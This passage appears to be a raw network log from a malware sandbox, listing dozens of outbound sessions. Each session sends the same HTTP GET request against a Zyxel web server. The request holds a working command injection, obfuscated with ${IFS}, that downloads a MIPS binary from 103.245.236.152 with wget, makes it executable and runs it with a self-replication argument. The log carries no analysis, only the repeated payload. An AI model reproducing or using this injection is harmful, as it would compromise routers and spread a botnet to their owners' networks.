                                      Jan 14, 2024 15:50:34.005692959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1265192.168.2.1433936131.63.218.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005747080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1266192.168.2.1442830200.189.65.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005786896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1267192.168.2.1443318209.217.18.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005825043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1268192.168.2.1440600100.192.94.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005852938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1269192.168.2.144581058.81.55.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005901098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1270192.168.2.1447088117.174.81.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005945921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1271192.168.2.144305444.35.6.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.005990982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1272192.168.2.1433456200.220.105.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006046057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1273192.168.2.1442048222.11.178.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006083012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1274192.168.2.144493854.255.71.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006119013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1275192.168.2.1460540168.32.214.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006160975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1276192.168.2.1440088125.154.212.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006216049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1277192.168.2.1460654180.70.52.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006248951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1278192.168.2.1432802209.220.61.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006295919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1279192.168.2.1447122190.238.28.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006330013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1280192.168.2.1443234198.186.81.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006365061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1281192.168.2.1440128120.24.218.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006426096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1282192.168.2.1438072155.80.102.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006465912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1283192.168.2.143297813.50.247.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006493092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1284192.168.2.1441638204.176.79.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006544113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1285192.168.2.144200035.118.62.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006581068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1286192.168.2.1433902120.202.37.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006608963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1287192.168.2.1460058194.10.214.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006655931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1288192.168.2.1455996111.88.119.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006684065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1289192.168.2.144467844.53.175.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006720066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1290192.168.2.145808692.190.42.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006768942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1291192.168.2.1441230101.96.36.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006800890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1292192.168.2.1451602176.100.66.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006865978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1293192.168.2.143447235.36.173.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006891966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1294192.168.2.1435950188.131.94.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006921053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1295192.168.2.145264257.242.168.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006977081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1296192.168.2.1442134151.156.247.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.006999016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1297192.168.2.14533141.142.179.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.007062912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1298192.168.2.1447542147.119.202.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.007091999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1299192.168.2.1434750173.12.220.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.007121086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1300192.168.2.1447252128.255.194.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.007164001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1301192.168.2.1459306204.54.200.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.007198095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1302192.168.2.144917290.139.16.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.007237911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1303192.168.2.143442674.59.199.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.007268906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1304192.168.2.1447570171.35.168.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.007333994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1305192.168.2.1436274143.140.63.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.007364988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1306192.168.2.143605446.78.2.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.007411957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1307192.168.2.145983698.2.99.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.007447004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1308192.168.2.145717279.210.234.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.007489920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1309192.168.2.145680060.98.213.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.007510900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1310192.168.2.14471889.230.154.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.007555962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1311192.168.2.1459352151.107.160.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.007591009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1312192.168.2.1459930100.178.71.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.007646084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1313192.168.2.145879217.124.243.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.007654905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1314192.168.2.1448058116.169.112.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.007694960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1315192.168.2.1439032122.79.17.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.007730007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1316192.168.2.1450130104.124.184.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.010936975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1317192.168.2.1451908120.48.81.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.011432886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1318192.168.2.1443768166.234.7.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.011477947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1319192.168.2.1452852143.44.202.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.011508942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1320192.168.2.1457400150.49.150.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.011569023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1321192.168.2.1453378107.125.185.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.011601925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1322192.168.2.1450410115.52.47.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.011653900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1323192.168.2.145307065.68.187.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.011687994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1324192.168.2.1436770204.52.223.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.011744976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1325192.168.2.144284495.39.132.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:34.011770964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1326192.168.2.1444114112.157.189.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.021256924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1327192.168.2.143841424.55.122.44443
                                      TimestampBytes transferredDirectionData
